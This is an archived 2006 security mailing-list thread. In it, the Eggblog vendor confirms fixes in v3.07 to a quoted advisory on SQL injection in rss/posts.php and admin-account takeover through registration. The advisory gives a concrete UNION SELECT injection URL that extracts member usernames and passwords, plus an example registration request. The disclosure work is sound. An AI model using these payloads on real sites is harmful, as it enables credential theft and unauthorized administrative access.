[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

RE: Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities

To: "'Mustafa Can Bjorn IPEKCI'" <nukedx@xxxxxxxxxx>, <submit@xxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>, <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: RE: Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities
From: "Egg" <egg@xxxxxxxxxxxxxxxxx>
Date: Mon, 29 May 2006 17:42:52 +0100

These issues have been fixed as of v3.07.

v2 is not supported and should no longer be available to download. Please
let me know if this is not the case.

Thanks,

Egg
www.eggblog.net


-----Original Message-----
From: Mustafa Can Bjorn IPEKCI [mailto:nukedx@xxxxxxxxxx] 
Sent: 28 May 2006 15:01
To: submit@xxxxxxxxxxx; full-disclosure@xxxxxxxxxxxxxxxxx;
bugtraq@xxxxxxxxxxxxxxxxx; egg@xxxxxxxxxxxxxxxxx
Subject: Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities

--Security Report--
Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 06:15 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@xxxxxxxxxx
Web: http://www.nukedx.com
}
---
Vendor: Eggblog (http://www.eggblog.net/)
Version: 3.0.6 and prior versions must be affected.
About: Via this method remote attacker can inject arbitrary SQL queries to
Eggblog.This SQL injection works with Eggblog version 3.0.6 and below.The
problem is that id parameter id rss/posts.php did not sanitized properly
before using it in SQL query.This caused to remote attacker inject arbitrary
SQL queries and execute them.This SQL injection needs magic_quotes_gpc off.
There is another problem in Eggblog 2.x.In registration member register
status did not sanitized properly.This caused to remote attacker "register
new member" as a admin nick and get administration privileges on Eggblog.
Level: Critical
---
How&Example:
GET -> http://[site]/[EggBlog]/rss/posts.php?id=SQL
EXAMPLE ->
http://[site]/[EggBlog]/rss/posts.php?id=1'/**/UNION/**/SELECT/**/0,concat('
Username:%20',username),
concat('Password:%20',password)/**/from/**/eggblog_members/*
POST/EXAMPLE ->
http://[site]/[EggBlog]/home/register.php?username=victim&password=password&;
email=e@xxxxxxxx&ref=
--
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=36
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=36

References:
- Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities
  - From: Mustafa Can Bjorn IPEKCI

Prev by Date: RE: Advisory: Blend Portal <= 1.2.0 for phpBB 2.x(blend_data/blend_common.php) File Inclusion Vulnerability
Next by Date: Re: Proof of concept that PGP AUTHENTICATION CAN BE BYPASSED WITHOUT PATCHING
Previous by thread: Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities
Next by thread: Advisory: phpBB 2.x (admin/admin_hacks_list.php) Local Inclusion Vulnerability.
Index(es):
- Date
- Thread